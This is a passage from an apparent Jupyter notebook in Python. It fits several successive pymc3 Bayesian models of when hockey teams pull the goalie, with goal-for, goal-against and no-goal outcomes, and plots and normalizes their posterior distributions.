color='red', label='mu_goal_against',
histtype='stepfilled', alpha=ALPHA)
plt.ylabel('MCMC counts')
plt.xlabel('$\mu$ (seconds)')
plt.legend();
ALPHA = 0.6
LW = 3
''' Plot the MCMC samples '''
# density=True normalizes the histograms. The original passed the
# string 'normed', which only worked because any non-empty string is
# truthy; matplotlib's `density` parameter is a bool.
plt.hist(burned_trace['p_goal_for'] / 60, bins=50,
         color='green', label='p_goal_for samples',
         density=True,
         histtype='stepfilled', alpha=ALPHA)
plt.hist(burned_trace['p_goal_against'] / 60, bins=50,
         color='red', label='p_goal_against samples',
         density=True,
         histtype='stepfilled', alpha=ALPHA)
''' Plot the poisson distributions '''
p = poisson.pmf
x = np.arange(16*60, 22*60, 1)
mu_goal_for = burned_trace['mu_goal_for'].mean()
mu_goal_against = burned_trace['mu_goal_against'].mean()
y_goal_for = p(x, mu_goal_for)
y_goal_against = p(x, mu_goal_against)
# Convert into minutes and rescale to fit chart
x = x / 60
scale_frac = 0.7
y_goal_for = y_goal_for / y_goal_for.max() * scale_frac
y_goal_against = y_goal_against / y_goal_against.max() * scale_frac
plt.plot(x, y_goal_for, label=r'$P(\rm{goal\;for};\mu_{MCMC})$', color='green', lw=LW)
plt.plot(x, y_goal_against, label=r'$P(\rm{goal\;against};\mu_{MCMC})$', color='red', lw=LW)
plt.ylabel('Counts')
# plt.yticks([])
plt.xlabel('Game clock (3rd period)')
plt.legend();
# Let's test this with a uniform prior
def bayes_model(training_samples) -> tuple:
    """
    Solve for posterior distributions using pymc3.

    Returns
    -------
    (model, trace) : pymc3 Model and MCMC trace (18k Metropolis steps).
    """
    with pm.Model() as model:
        # Priors for the goal probabilities
        # Last 5 minutes of the game, in seconds
        # p_goal_for = pm.Uniform('p_goal_for', 15*60, 20*60)
        # p_goal_against = pm.Uniform('p_goal_against', 15*60, 20*60)
        # Priors for the mu parameter of the poisson distribution
        # Note that mu = mean(Poisson)
        mu_goal_for = pm.Uniform('mu_goal_for', 15*60, 20*60)
        mu_goal_against = pm.Uniform('mu_goal_against', 15*60, 20*60)
        # Observations
        obs_goal_for = pm.Poisson(
            'obs_goal_for',
            mu=mu_goal_for,
            observed=training_samples[0],
        )
        obs_goal_against = pm.Poisson(
            'obs_goal_against',
            mu=mu_goal_against,
            observed=training_samples[1],
        )
        # NOTE(review): pm.Deterministic here wraps a *new* stochastic
        # Poisson RV ('posterior_for'/'posterior_against'), so the p_*
        # nodes are just aliases of those RVs rather than deterministic
        # transforms — likely not what was intended (see later cells).
        p_goal_for = pm.Deterministic(
            'p_goal_for', pm.Poisson('posterior_for', mu_goal_for)
        )
        p_goal_against = pm.Deterministic(
            'p_goal_against', pm.Poisson('posterior_against', mu_goal_against)
        )
        # Fit model
        step = pm.Metropolis()
        trace = pm.sample(18000, step=step)
    return model, trace
model, trace = bayes_model(training_samples)
model
N_burn = 10000
burned_trace = trace[N_burn:]
ALPHA = 0.6
LW = 3
# plt.hist(burned_trace['p_goal_for'] / 60, bins=50,
# color='green', label=r'$P(\rm{goal\;for}\;|\;\rm{goalie\;pulled})$',
# histtype='stepfilled', alpha=ALPHA)
# plt.hist(burned_trace['p_goal_against'] / 60, bins=50,
# color='red', label=r'$P(\rm{goal\;against}\;|\;\rm{goalie\;pulled})$',
# histtype='stepfilled', alpha=ALPHA)
''' Plot the MCMC samples '''
plt.hist(burned_trace['p_goal_for'] / 60, bins=50,
color='green', label='p_goal_for samples',
density='normed',
histtype='stepfilled', alpha=ALPHA)
plt.hist(burned_trace['p_goal_against'] / 60, bins=50,
color='red', label='p_goal_against samples',
density='normed',
histtype='stepfilled', alpha=ALPHA)
''' Plot the poisson distributions '''
p = poisson.pmf
x = np.arange(16*60, 22*60, 1)
mu_goal_for = burned_trace['mu_goal_for'].mean()
mu_goal_against = burned_trace['mu_goal_against'].mean()
y_goal_for = p(x, mu_goal_for)
y_goal_against = p(x, mu_goal_against)
# Convert into minutes and rescale to fit chart
x = x / 60
scale_frac = 0.7
y_goal_for = y_goal_for / y_goal_for.max() * scale_frac
y_goal_against = y_goal_against / y_goal_against.max() * scale_frac
plt.plot(x, y_goal_for, label=r'$P(\rm{goal\;for};\mu_{MCMC})$', color='green', lw=LW)
plt.plot(x, y_goal_against, label=r'$P(\rm{goal\;against};\mu_{MCMC})$', color='red', lw=LW)
plt.ylabel('Counts')
# plt.yticks([])
plt.xlabel('Game clock (3rd period)')
plt.legend();
plt.show()
trace['mu_goal_for'].mean(), trace['mu_goal_against'].mean()
plt.plot(trace['mu_goal_for'], label='mu_goal_for', color='green')
plt.plot(trace['mu_goal_against'], label='mu_goal_against', color='red')
plt.ylabel('$\mu$ (seconds)')
plt.xlabel('MCMC step')
plt.axvline(N_burn, color='black', lw=2, label='Burn threshold')
plt.legend();
ALPHA = 0.6
plt.hist(burned_trace['mu_goal_for'], bins=50,
color='green', label='mu_goal_for',
histtype='stepfilled', alpha=ALPHA)
plt.hist(burned_trace['mu_goal_against'], bins=50,
color='red', label='mu_goal_against',
histtype='stepfilled', alpha=ALPHA)
plt.ylabel('MCMC counts')
plt.xlabel('$\mu$ (seconds)')
plt.legend();
burned_trace.varnames
# Here I tried to combine the observations and the posterior, but pymc3 treats these as separate types. The observations are deterministic whereas the posteriors are stochastic.
def bayes_model(training_samples) -> tuple:
    """
    Solve for posterior distributions using pymc3.

    In this variant the p_* nodes are the observed variables, so they
    double as the training likelihood (there are no separate obs_* nodes).

    Returns
    -------
    (model, trace) : pymc3 Model and MCMC trace (18k Metropolis steps).
    """
    with pm.Model() as model:
        # Observations to train the model
        # obs_goal_for = pm.Poisson(
        #     'obs_goal_for',
        #     mu=training_samples[0].mean(),
        #     observed=training_samples[0],
        # )
        # obs_goal_against = pm.Poisson(
        #     'obs_goal_against',
        #     mu=training_samples[1].mean(),
        #     observed=training_samples[1],
        # )
        # Priors for the mu parameter of the
        # Poisson distribution.
        # Note that mu = mean(Poisson)
        mu_goal_for = pm.Uniform(
            'mu_goal_for', 15*60, 20*60
        )
        mu_goal_against = pm.Uniform(
            'mu_goal_against', 15*60, 20*60
        )
        # Goal probabilities (observed => fixed to the training data)
        p_goal_for = pm.Poisson(
            'p_goal_for', mu_goal_for, observed=training_samples[0]
        )
        p_goal_against = pm.Poisson(
            'p_goal_against', mu_goal_against, observed=training_samples[1]
        )
        # Fit model
        step = pm.Metropolis()
        trace = pm.sample(18000, step=step)
    return model, trace
model, trace = bayes_model(training_samples)
model
N_burn = 10000
burned_trace = trace[N_burn:]
plt.plot(trace['mu_goal_for'], label='mu_goal_for', color='green')
plt.plot(trace['mu_goal_against'], label='mu_goal_against', color='red')
plt.ylabel('$\mu$ (seconds)')
plt.xlabel('MCMC step')
plt.axvline(N_burn, color='black', lw=2, label='Burn threshold')
plt.legend();
ALPHA = 0.6
plt.hist(burned_trace['mu_goal_for'], bins=50,
color='green', label='mu_goal_for',
histtype='stepfilled', alpha=ALPHA)
plt.hist(burned_trace['mu_goal_against'], bins=50,
color='red', label='mu_goal_against',
histtype='stepfilled', alpha=ALPHA)
plt.ylabel('MCMC counts')
plt.xlabel('$\mu$ (seconds)')
plt.legend();
ALPHA = 0.6
plt.hist(burned_trace['p_goal_for'], bins=50,
color='green', label='p_goal_for',
histtype='stepfilled', alpha=ALPHA)
plt.hist(burned_trace['p_goal_against'], bins=50,
color='red', label='p_goal_against',
histtype='stepfilled', alpha=ALPHA)
plt.ylabel('MCMC counts')
plt.xlabel('$\mu$ (seconds)')
plt.legend();
#
#
# Adding a constraint:
#
# ```_equation = pm.math.eq(p_goal_for + p_goal_against, 1)
# constraint = pm.Potential(
# 'constraint',
# pm.math.switch(_equation, 0, -np.inf)
# )```
def bayes_model(training_samples) -> tuple:
    """
    Solve for posterior distributions using pymc3.

    Adds a pm.Potential constraint requiring the two sampled Poisson
    values to sum to 1.

    Returns
    -------
    (model, trace) : pymc3 Model and MCMC trace (18k Metropolis steps).
    """
    with pm.Model() as model:
        # Observations to train the model
        # NOTE(review): these observed nodes use the fixed sample means
        # as mu, so the mu_* priors below are never conditioned on data
        # in this version — their posteriors are just the priors.
        obs_goal_for = pm.Poisson(
            'obs_goal_for',
            mu=training_samples[0].mean(),
            observed=training_samples[0],
        )
        obs_goal_against = pm.Poisson(
            'obs_goal_against',
            mu=training_samples[1].mean(),
            observed=training_samples[1],
        )
        # Priors for the mu parameter of the
        # Poisson distribution.
        # Note that mu = mean(Poisson)
        mu_goal_for = pm.Uniform(
            'mu_goal_for', 15*60, 20*60
        )
        mu_goal_against = pm.Uniform(
            'mu_goal_against', 15*60, 20*60
        )
        # Goal probabilities
        p_goal_for = pm.Poisson(
            'p_goal_for', mu_goal_for
        )
        p_goal_against = pm.Poisson(
            'p_goal_against', mu_goal_against
        )
        # Constraint on probabilities: log-prob is -inf unless the two
        # sampled values sum to exactly 1 (integer Poisson draws in the
        # ~900-1200 range essentially never satisfy this — see the
        # "didn't work too well" note after this cell).
        _equation = pm.math.eq(p_goal_for + p_goal_against, 1)
        constraint = pm.Potential(
            'constraint',
            pm.math.switch(_equation, 0, -np.inf)
        )
        # Fit model
        step = pm.Metropolis()
        trace = pm.sample(18000, step=step)
    return model, trace
model, trace = bayes_model(training_samples)
model
N_burn = 10000
burned_trace = trace[N_burn:]
plt.plot(trace['mu_goal_for'], label='mu_goal_for', color='green')
plt.plot(trace['mu_goal_against'], label='mu_goal_against', color='red')
plt.ylabel('$\mu$ (seconds)')
plt.xlabel('MCMC step')
plt.axvline(N_burn, color='black', lw=2, label='Burn threshold')
plt.legend();
ALPHA = 0.6
plt.hist(burned_trace['mu_goal_for'], bins=50,
color='green', label='mu_goal_for',
histtype='stepfilled', alpha=ALPHA)
plt.hist(burned_trace['mu_goal_against'], bins=50,
color='red', label='mu_goal_against',
histtype='stepfilled', alpha=ALPHA)
plt.ylabel('MCMC counts')
plt.xlabel('$\mu$ (seconds)')
plt.legend();
ALPHA = 0.6
plt.hist(burned_trace['p_goal_for'], bins=50,
color='green', label='p_goal_for',
histtype='stepfilled', alpha=ALPHA)
plt.hist(burned_trace['p_goal_against'], bins=50,
color='red', label='p_goal_against',
histtype='stepfilled', alpha=ALPHA)
plt.ylabel('MCMC counts')
plt.xlabel('$\mu$ (seconds)')
plt.legend();
# That didn't work too well...
#
# But we're getting closer to the final model
#
# ---
#
# #### Including "no goals" variable
#
# Lets make them bounded and add in the game end var
# Inspect the available columns
df.columns
# Load time of pull for eventual outcomes:
feature_names = ['goal_for', 'goal_against', 'no_goals']
# Logic for loading the data
features = ['pull_time', 'pull_time', 'pull_time']
# Masks: games ending in a goal for, a goal against, and games with
# no goal after the pull (both goal-time columns null)
masks = [
    ~(df.goal_for_time.isnull()),
    ~(df.goal_against_time.isnull()),
    (df.goal_for_time.isnull() & df.goal_against_time.isnull()),
]
training_samples = load_training_samples(df, features, masks)
# Peek at the first few samples of each class
(training_samples[0][:10],
 training_samples[1][:10],
 training_samples[2][:10],)
# Trying constrained model again
def bayes_model(training_samples) -> tuple:
    """
    Solve for posterior distributions using pymc3.

    Three-outcome variant (goal for / goal against / no goal) with
    bounded Poisson posterior nodes and a sum-to-1 Potential constraint.

    Returns
    -------
    (model, trace) : pymc3 Model and MCMC trace (18k Metropolis steps).
    """
    with pm.Model() as model:
        # Priors for the mu parameter of the
        # Poisson distribution P.
        # Note: mu = mean(P)
        mu_goal_for = pm.Uniform(
            'mu_goal_for', 15*60, 20*60
        )
        mu_goal_against = pm.Uniform(
            'mu_goal_against', 15*60, 20*60
        )
        mu_no_goal = pm.Uniform(
            'mu_no_goal', 15*60, 20*60
        )
        # Observations to train the model on
        obs_goal_for = pm.Poisson(
            'obs_goal_for',
            mu=mu_goal_for,
            observed=training_samples[0],
        )
        obs_goal_against = pm.Poisson(
            'obs_goal_against',
            mu=mu_goal_against,
            observed=training_samples[1],
        )
        obs_no_goal = pm.Poisson(
            'obs_no_goal',
            mu=mu_no_goal,
            observed=training_samples[2],
        )
        # Outcome probabilities, bounded at the end of regulation (20 min)
        p_goal_for = pm.Bound(pm.Poisson, upper=20*60)('p_goal_for', mu=mu_goal_for)
        p_goal_against = pm.Bound(pm.Poisson, upper=20*60)('p_goal_against', mu=mu_goal_against)
        p_no_goal = pm.Bound(pm.Poisson, upper=20*60)('p_no_goal', mu=mu_no_goal)
        # Constraint on probabilities (log-prob -inf unless they sum to 1)
        _equation = pm.math.eq(p_goal_for + p_goal_against + p_no_goal, 1)
        constraint = pm.Potential(
            'constraint',
            pm.math.switch(_equation, 0, -np.inf)
        )
        # Fit model
        step = pm.Metropolis()
        trace = pm.sample(18000, step=step)
    return model, trace
model, trace = bayes_model(training_samples)
model
N_burn = 10000
burned_trace = trace[N_burn:]
ALPHA = 0.6
LW = 3
from scipy.stats import poisson
# plt.hist(burned_trace['p_goal_for'] / 60, bins=50,
# color='green', label=r'$P(\rm{goal\;for}\;|\;\rm{goalie\;pulled})$',
# histtype='stepfilled', alpha=ALPHA)
# plt.hist(burned_trace['p_goal_against'] / 60, bins=50,
# color='red', label=r'$P(\rm{goal\;against}\;|\;\rm{goalie\;pulled})$',
# histtype='stepfilled', alpha=ALPHA)
''' Plot the MCMC samples '''
plt.hist(burned_trace['p_goal_for'] / 60, bins=50,
color='green', label='p_goal_for samples',
density='normed',
histtype='stepfilled', alpha=ALPHA)
plt.hist(burned_trace['p_goal_against'] / 60, bins=50,
color='red', label='p_goal_against samples',
density='normed',
histtype='stepfilled', alpha=ALPHA)
plt.hist(burned_trace['p_no_goal'] / 60, bins=50,
color='orange', label='p_no_goal samples',
density='normed',
histtype='stepfilled', alpha=ALPHA)
''' Plot the poisson distributions '''
# p = poisson.pmf
# x = np.arange(16*60, 22*60, 1)
# mu_goal_for = burned_trace['mu_goal_for'].mean()
# mu_goal_against = burned_trace['mu_goal_against'].mean()
# mu_no_goal = burned_trace['mu_no_goal'].mean()
# y_goal_for = p(x, mu_goal_for)
# y_goal_against = p(x, mu_goal_against)
# y_no_goal = p(x, mu_no_goal)
# # Convert into minutes and rescale to fit chart
# x = x / 60
# scale_frac = 0.7
# y_goal_for = y_goal_for / y_goal_for.max() * scale_frac
# y_goal_against = y_goal_against / y_goal_against.max() * scale_frac
# y_no_goal = y_no_goal / y_no_goal.max() * scale_frac
# plt.plot(x, y_goal_for, label=r'$P(\rm{goal\;for};\mu_{MCMC})$', color='green', lw=LW)
# plt.plot(x, y_goal_against, label=r'$P(\rm{goal\;against};\mu_{MCMC})$', color='red', lw=LW)
# plt.plot(x, y_no_goal, label=r'$P(\rm{no\;goal};\mu_{MCMC})$', color='orange', lw=LW)
plt.ylabel('Counts')
# plt.yticks([])
plt.xlabel('Game clock (3rd period)')
plt.legend();
plt.show()
# Constraints just don't make sense here...
#
# Removing them.
def bayes_model(training_samples) -> tuple:
    """
    Solve for posterior distributions using pymc3.

    Three-outcome variant with bounded Poisson posterior nodes and no
    sum-to-1 constraint (the constraint is applied analytically later).

    Returns
    -------
    (model, trace) : pymc3 Model and MCMC trace (18k Metropolis steps).
    """
    with pm.Model() as model:
        # Priors for the mu parameter of the
        # Poisson distribution P.
        # Note: mu = mean(P)
        mu_goal_for = pm.Uniform(
            'mu_goal_for', 15*60, 20*60
        )
        mu_goal_against = pm.Uniform(
            'mu_goal_against', 15*60, 20*60
        )
        mu_no_goal = pm.Uniform(
            'mu_no_goal', 15*60, 20*60
        )
        # Observations to train the model on
        obs_goal_for = pm.Poisson(
            'obs_goal_for',
            mu=mu_goal_for,
            observed=training_samples[0],
        )
        obs_goal_against = pm.Poisson(
            'obs_goal_against',
            mu=mu_goal_against,
            observed=training_samples[1],
        )
        obs_no_goal = pm.Poisson(
            'obs_no_goal',
            mu=mu_no_goal,
            observed=training_samples[2],
        )
        # Outcome probabilities, bounded at the end of regulation (20 min)
        p_goal_for = pm.Bound(pm.Poisson, upper=20*60)('p_goal_for', mu=mu_goal_for)
        p_goal_against = pm.Bound(pm.Poisson, upper=20*60)('p_goal_against', mu=mu_goal_against)
        p_no_goal = pm.Bound(pm.Poisson, upper=20*60)('p_no_goal', mu=mu_no_goal)
        # Fit model
        step = pm.Metropolis()
        trace = pm.sample(18000, step=step)
    return model, trace
model, trace = bayes_model(training_samples)
model
N_burn = 10000
burned_trace = trace[N_burn:]
ALPHA = 0.6
LW = 3
from scipy.stats import poisson
# plt.hist(burned_trace['p_goal_for'] / 60, bins=50,
# color='green', label=r'$P(\rm{goal\;for}\;|\;\rm{goalie\;pulled})$',
# histtype='stepfilled', alpha=ALPHA)
# plt.hist(burned_trace['p_goal_against'] / 60, bins=50,
# color='red', label=r'$P(\rm{goal\;against}\;|\;\rm{goalie\;pulled})$',
# histtype='stepfilled', alpha=ALPHA)
''' Plot the MCMC samples '''
plt.hist(burned_trace['p_goal_for'] / 60, bins=50,
color='green', label='p_goal_for samples',
density='normed',
histtype='stepfilled', alpha=ALPHA)
plt.hist(burned_trace['p_goal_against'] / 60, bins=50,
color='red', label='p_goal_against samples',
density='normed',
histtype='stepfilled', alpha=ALPHA)
plt.hist(burned_trace['p_no_goal'] / 60, bins=50,
color='orange', label='p_no_goal samples',
density='normed',
histtype='stepfilled', alpha=ALPHA)
''' Plot the poisson distributions '''
p = poisson.pmf
x = np.arange(16*60, 22*60, 1)
mu_goal_for = burned_trace['mu_goal_for'].mean()
mu_goal_against = burned_trace['mu_goal_against'].mean()
mu_no_goal = burned_trace['mu_no_goal'].mean()
y_goal_for = p(x, mu_goal_for)
y_goal_against = p(x, mu_goal_against)
y_no_goal = p(x, mu_no_goal)
# Convert into minutes and rescale to fit chart
x = x / 60
scale_frac = 0.7
y_goal_for = y_goal_for / y_goal_for.max() * scale_frac
y_goal_against = y_goal_against / y_goal_against.max() * scale_frac
y_no_goal = y_no_goal / y_no_goal.max() * scale_frac
plt.plot(x, y_goal_for, label=r'$P(\rm{goal\;for};\mu_{MCMC})$', color='green', lw=LW)
plt.plot(x, y_goal_against, label=r'$P(\rm{goal\;against};\mu_{MCMC})$', color='red', lw=LW)
plt.plot(x, y_no_goal, label=r'$P(\rm{no\;goal};\mu_{MCMC})$', color='orange', lw=LW)
plt.ylabel('Counts')
# plt.yticks([])
plt.xlabel('Game clock (3rd period)')
plt.legend();
plt.show()
plt.plot(trace['mu_goal_for'], label='mu_goal_for', color='green')
plt.plot(trace['mu_goal_against'], label='mu_goal_against', color='red')
plt.plot(trace['mu_no_goal'], label='mu_no_goal', color='orange')
plt.ylabel('$\mu$ (seconds)')
plt.xlabel('MCMC step')
plt.axvline(N_burn, color='black', lw=2, label='Burn threshold')
plt.legend();
ALPHA = 0.6
plt.hist(burned_trace['mu_goal_for'], bins=50,
color='green', label='mu_goal_for',
histtype='stepfilled', alpha=ALPHA)
plt.hist(burned_trace['mu_goal_against'], bins=50,
color='red', label='mu_goal_against',
histtype='stepfilled', alpha=ALPHA)
plt.hist(burned_trace['mu_no_goal'], bins=50,
color='orange', label='mu_no_goal',
histtype='stepfilled', alpha=ALPHA)
plt.ylabel('MCMC counts')
plt.xlabel('$\mu$ (seconds)')
plt.legend();
# Now I need to normalize these guys. It looks like they don't have an even number of samples... let's check on that
(burned_trace['mu_goal_for'].shape,
burned_trace['mu_goal_against'].shape,
burned_trace['mu_no_goal'].shape)
len(burned_trace) * 4
# Nice! Same number of samples. Weird that it's 4x my burned trace - probably due to 4 cores
# Class priors: fraction of games in each outcome class.
# Use the sample counts (shape[0]) rather than the raw ``.shape``
# tuples, so the result is a flat (3,) probability vector instead of
# the (3, 1) array the original produced (behavior downstream is the
# same via broadcasting, but this avoids the later ``.flatten()``
# surprise).
normed_factors = np.array([
    training_samples[0].shape[0],
    training_samples[1].shape[0],
    training_samples[2].shape[0],
])
normed_factors = normed_factors / normed_factors.sum()
normed_factors
# Those ^ are the normalizing class probabilities
ALPHA = 0.6
LW = 3
BINS = 60
# plt.hist(burned_trace['p_goal_for'] / 60, bins=50,
# color='green', label=r'$P(\rm{goal\;for}\;|\;\rm{goalie\;pulled})$',
# histtype='stepfilled', alpha=ALPHA)
# plt.hist(burned_trace['p_goal_against'] / 60, bins=50,
# color='red', label=r'$P(\rm{goal\;against}\;|\;\rm{goalie\;pulled})$',
# histtype='stepfilled', alpha=ALPHA)
''' Plot the MCMC samples '''
plt.hist(np.random.choice(
burned_trace['p_goal_for'] / 60,
size=int(burned_trace['p_goal_for'].shape[0] * normed_factors[0])
),
bins=BINS, color='green', label='p_goal_for samples',
# density='normed',
histtype='stepfilled', alpha=ALPHA, zorder=3)
plt.hist(np.random.choice(
burned_trace['p_goal_against'] / 60,
size=int(burned_trace['p_goal_against'].shape[0] * normed_factors[1])
),
bins=BINS,
color='red', label='p_goal_against samples',
# density='normed',
histtype='stepfilled', alpha=ALPHA, zorder=2)
plt.hist(np.random.choice(
burned_trace['p_no_goal'] / 60,
size=int(burned_trace['p_no_goal'].shape[0] * normed_factors[2])
),
bins=BINS,
color='orange', label='p_no_goal samples',
# density='normed',
histtype='stepfilled', alpha=ALPHA)
plt.ylabel('Sampled frequency (normed)')
plt.yticks([])
plt.xlabel('Game clock (3rd period)')
plt.legend();
plt.show()
from scipy.stats import poisson
ALPHA = 0.6
LW = 3
''' Plot the poisson distributions '''
p = poisson.pmf
x = np.arange(16*60, 20*60, 1)
mu_goal_for = burned_trace['mu_goal_for'].mean()
mu_goal_against = burned_trace['mu_goal_against'].mean()
mu_no_goal = burned_trace['mu_no_goal'].mean()
y_goal_for = p(x, mu_goal_for) * normed_factors[0]
y_goal_against = p(x, mu_goal_against) * normed_factors[1]
y_no_goal = p(x, mu_no_goal) * normed_factors[2]
# Convert into minutes and rescale to fit chart
x = x / 60
# scale_frac = 0.7
# y_goal_for = y_goal_for / y_goal_for.max() * normed_factors[0]
# y_goal_against = y_goal_against / y_goal_against.max() * normed_factors[1]
# y_no_goal = y_no_goal / y_no_goal.max() * normed_factors[2]
plt.plot(x, y_goal_for, label=r'$P(\rm{goal\;for};\mu_{MCMC})$', color='green', lw=LW)
plt.plot(x, y_goal_against, label=r'$P(\rm{goal\;against};\mu_{MCMC})$', color='red', lw=LW)
plt.plot(x, y_no_goal, label=r'$P(\rm{no\;goal};\mu_{MCMC})$', color='orange', lw=LW)
# plt.ylabel('Posterior PDF')
# plt.yticks([])
plt.xlabel('Game clock (3rd period)')
plt.legend();
plt.show()
y_goal_for.sum() + y_goal_against.sum() + y_no_goal.sum()
# This is less than 1 because I cut off the tail..
#
# We can easily **correct for this by renormalizing**
cutoff_renormed_factor = 2 - (y_goal_for.sum() + y_goal_against.sum() + y_no_goal.sum())
cutoff_renormed_factor
from scipy.stats import poisson
ALPHA = 0.6
LW = 3
''' Plot the poisson distributions '''
p = poisson.pmf
x = np.arange(16*60, 20*60, 1)
mu_goal_for = burned_trace['mu_goal_for'].mean()
mu_goal_against = burned_trace['mu_goal_against'].mean()
mu_no_goal = burned_trace['mu_no_goal'].mean()
y_goal_for = p(x, mu_goal_for) * normed_factors[0]
y_goal_against = p(x, mu_goal_against) * normed_factors[1]
y_no_goal = p(x, mu_no_goal) * normed_factors[2]
cutoff_renormed_factor = 2 - (y_goal_for.sum() + y_goal_against.sum() + y_no_goal.sum())
y_goal_for = y_goal_for * cutoff_renormed_factor
y_goal_against = y_goal_against * cutoff_renormed_factor
y_no_goal = y_no_goal * cutoff_renormed_factor
# Convert into minutes and rescale to fit chart
x = x / 60
# scale_frac = 0.7
# y_goal_for = y_goal_for / y_goal_for.max() * normed_factors[0]
# y_goal_against = y_goal_against / y_goal_against.max() * normed_factors[1]
# y_no_goal = y_no_goal / y_no_goal.max() * normed_factors[2]
plt.plot(x, y_goal_for, label=r'$P(\mathrm{goal\;for}\;|\;X)$', color='green', lw=LW)
plt.plot(x, y_goal_against, label=r'$P(\mathrm{goal\;against}\;|\;X)$', color='red', lw=LW)
plt.plot(x, y_no_goal, label=r'$P(\mathrm{no\;goal}\;|\;X)$', color='orange', lw=LW)
plt.ylabel('Posterior probability')
# plt.yticks([])
plt.xlabel('Game clock (3rd period)')
plt.legend();
plt.show()
y_goal_for.sum() + y_goal_against.sum() + y_no_goal.sum()
print(f'Final normalizing factors =\n{normed_factors * cutoff_renormed_factor}')
mu_mcmc = [
burned_trace['mu_goal_for'].mean(),
burned_trace['mu_goal_against'].mean(),
burned_trace['mu_no_goal'].mean(),
]
print(f'Final values for mu: {mu_mcmc}')
def convert_to_time_remaining(x):
    """Convert elapsed 3rd-period minutes into a time-remaining string.

    e.g. x = 19 (minutes elapsed) -> '0:01:00' remaining.
    """
    minutes_left = 20 - x
    return str(datetime.timedelta(seconds=minutes_left * 60))
convert_to_time_remaining(x[np.argmax(y_goal_for)])
print('Time of max posterior probability =\n'
f'{x[np.argmax(y_goal_for)], x[np.argmax(y_goal_against)], x[np.argmax(y_no_goal)]}')
print()
t_remaining = [convert_to_time_remaining(x[np.argmax(y_goal_for)]),
convert_to_time_remaining(x[np.argmax(y_goal_against)]),
convert_to_time_remaining(x[np.argmax(y_no_goal)])]
print(f'Time of max posterior probability =\n{t_remaining}')
# Great, now we have properly normalized probabilities.
#
# Notes:
# - From normalizing factors, we can see ~12% chance of scoring when pulling the goalie on average.
# - Probability of scoring peaks at 18.55 mins (1:27 remaining), with other probabilties following close after (01:20 for goal against and 01:07 for no goals)
# From now on we'll **try to** work from the distributions as our source of truth.
#
# Let's plot the cumulative distribution.
# Normalizing factors and mu estimates from the MCMC run.
# NOTE: spelled "normalizing" — later cells reference
# ``model_normalizing_factors``, but the original assignment was
# misspelled ``model_normlizing_factors``, which would raise a
# NameError downstream.
model_normalizing_factors = (normed_factors * cutoff_renormed_factor).flatten()
mu_mcmc = [
    burned_trace['mu_goal_for'].mean(),
    burned_trace['mu_goal_against'].mean(),
    burned_trace['mu_no_goal'].mean(),
]
# Hard-coded snapshot of the values above, so later cells can be
# re-run without re-sampling the model.
model_normalizing_factors = [
    0.1292882,
    0.26528024,
    0.62489297,
]
mu_mcmc = [
    1113.8279468130681,
    1120.1830172722719,
    1133.9420018554083
]
from scipy.stats import poisson
p = poisson.pmf
x = np.arange(16*60, 20*60, 1)
mu_goal_for = burned_trace['mu_goal_for'].mean()
mu_goal_against = burned_trace['mu_goal_against'].mean()
mu_no_goal = burned_trace['mu_no_goal'].mean()
y_goal_for = p(x, mu_goal_for) * normed_factors[0]
y_goal_against = p(x, mu_goal_against) * normed_factors[1]
y_no_goal = p(x, mu_no_goal) * normed_factors[2]
cutoff_renormed_factor = 2 - (y_goal_for.sum() + y_goal_against.sum() + y_no_goal.sum())
y_goal_for = y_goal_for * cutoff_renormed_factor
y_goal_against = y_goal_against * cutoff_renormed_factor
y_no_goal = y_no_goal * cutoff_renormed_factor
y_goal_for.sum() + y_goal_against.sum() + y_no_goal.sum()
# ---
#
# Trying to figure out the standard error on the odds estimate
# https://stats.stackexchange.com/a/15373/130459
#
# $$
# odds = P(goal\;for)\;/\;(P(goal\;against) * P(no\;goal))
# $$
def std_err(mu, n):
    """Standard error of a Poisson mean estimate: sqrt(mu / n).

    (PEP 8 E731: a named lambda assignment is better written as a def.)
    """
    return np.sqrt(mu / n)
std_err(mu_mcmc[0], 1), std_err(mu_mcmc[0], 10), std_err(mu_mcmc[0], 100)
# This is tricky...
#
# ---
#
# #### 2018-03-10
#
# Let's go back to the drawing board and add some things to the model.
#
# $$
# \alpha \cdot \big[ P(goal\;for) + (P(goal\;against) + P(no\;goal)\big] = 1 \\
# \vdots \\
# \alpha = \big[ P(goal\;for) + (P(goal\;against) + P(no\;goal)\big]^{-1}
# $$
#
# This will allow us to re-weight the posteriors later, so we can compare them better and yield a different interpretation.
# Adding in
# - MAP starting points
# - $\alpha$ constraint param
def bayes_model(training_samples) -> tuple:
    """
    Solve for posterior distributions using pymc3.

    Adds a MAP starting point for the sampler and a deterministic
    ``alpha`` re-weighting node: alpha = 1 / (p_for + p_against + p_no_goal).

    Returns
    -------
    (model, trace) : pymc3 Model and MCMC trace (18k Metropolis steps).
    """
    with pm.Model() as model:
        # Priors for the mu parameter of the
        # Poisson distribution P.
        # Note: mu = mean(P)
        mu_goal_for = pm.Uniform(
            'mu_goal_for', 15*60, 20*60
        )
        mu_goal_against = pm.Uniform(
            'mu_goal_against', 15*60, 20*60
        )
        mu_no_goal = pm.Uniform(
            'mu_no_goal', 15*60, 20*60
        )
        # Observations to train the model on
        obs_goal_for = pm.Poisson(
            'obs_goal_for',
            mu=mu_goal_for,
            observed=training_samples[0],
        )
        obs_goal_against = pm.Poisson(
            'obs_goal_against',
            mu=mu_goal_against,
            observed=training_samples[1],
        )
        obs_no_goal = pm.Poisson(
            'obs_no_goal',
            mu=mu_no_goal,
            observed=training_samples[2],
        )
        # Outcome probabilities, bounded at the end of regulation (20 min)
        BoundPoisson = lambda name, mu: pm.Bound(pm.Poisson, upper=20*60)(name, mu=mu)
        p_goal_for = BoundPoisson('p_goal_for', mu=mu_goal_for)
        p_goal_against = BoundPoisson('p_goal_against', mu=mu_goal_against)
        p_no_goal = BoundPoisson('p_no_goal', mu=mu_no_goal)
        # Constraint parameter for re-weighting
        # posterior samples
        alpha = pm.Deterministic(
            'alpha',
            1 / (p_goal_for + p_goal_against + p_no_goal)
        )
        # Fit model
        # NOTE(review): pymc3 warns against using find_MAP to initialize
        # sampling (see the UserWarning quoted after this cell).
        start = pm.find_MAP()
        step = pm.Metropolis()
        trace = pm.sample(18000, step=step, start=start)
    return model, trace
model, trace = bayes_model(training_samples)
model
# > UserWarning: find_MAP should not be used to initialize the NUTS sampler, simply call pymc3.sample() and it will automatically initialize NUTS in a better way.
#
# Let's not use MAP
N_burn = 10000
burned_trace = trace[N_burn:]
from typing import Tuple
from scipy.stats import poisson
def poisson_posterior(
    mu=None,
    norm_factors=None,
) -> Tuple[np.ndarray, ...]:
